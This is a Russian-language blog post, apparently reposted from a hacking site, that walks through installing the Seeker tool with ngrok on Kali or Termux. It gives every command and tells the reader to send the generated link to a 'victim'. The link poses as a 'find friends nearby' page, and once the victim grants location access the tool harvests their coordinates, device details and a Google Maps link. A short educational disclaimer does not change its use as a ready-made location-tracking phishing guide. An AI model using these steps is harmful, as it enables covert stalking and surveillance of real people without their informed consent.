8 подписчиков

Как хакеры могут узнать точное местоположение жертвы

15 августа 202015 авг 2020

2 мин

Оглавление

Инструкция по установке и использованию Seeker.
Kali Linux / Ubuntu / Parrot OS
Termux

Локнетовцы, приветствую! В сегодняшней статье мы рассмотрим, как хакеры могут узнать местоположение жертвы, с помощью специального инструмента, который называется Seeker.

Замечу, что эта статья написана только для образовательных целей. Мы никого ни к чему не призываем, только в целях ознакомления! Автор не несёт ответственности за ваши действия!

Seeker – это утилита, которая устанавливает сайт на сервер Apache и, используя Ngrok, создаёт ссылку при переходе по которой будет запрошен доступ к геолокации, в случае если такой доступ предоставлен, нам передаются данные устройства к которому получен доступ и координаты этого устройства, дополнительно сразу же формируется ссылка на Google Maps, с отметкой о местонахождении устройства.

Инструкция по установке и использованию Seeker.

Kali Linux / Ubuntu / Parrot OS

pkg install git
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 install.sh
./install.sh

Termux

Устанавливаем ngrok

apt update && apt upgrade
pkg install git
git clone https://github.com/tchelospy/termux-ngrok.git
cd termux-ngrok
chmod +x termux-ngrok.sh
./termux-ngrok.sh

Устанавливаем seeker

git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 termux_install.sh
./termux_install.sh

После установки, запускаем Seeker следующей командой:

python3 seeker.py -t manual

Затем выбираем цифру 0 (NearYou)

В новом окне запускаем ngrok через команду: ngrok http 8080

После этого копируем полученную ссылку, и добавляем в конец /nearyou, чтобы получилось https://c8d69da21529.ngrok.io/nearyou (У вас ссылка будет другая)

Затем, скидываем ссылку нашей жертве.

Когда жертва перейдёт по ссылке, она увидит сайт с предложением поискать друзей вокруг.

При нажатии кнопки “Continue” сайт запросит разрешение на доступ к геолокации и как только такой доступ будет получен, Seeker покажет подробные данные об устройстве жертвы, и его местоположении.

Мы увидим: данные операционной системы, версию браузера, страну, регион, город и название провайдера, а также долготу, широту, точность определения места, высоту над уровнем моря, а также ссылку на Google Maps, чтобы наглядно увидеть местоположение определенных координат.

По поводу точности определения: стационарные компьютеры (и ноутбуки) определяет с точностью 10-15 метров, телефоны на Android – 10-20 метров, iphone – 60-70 метров

Источник: https://hacker-basement.ru/2019/06/29/seeker-geolocation-determination/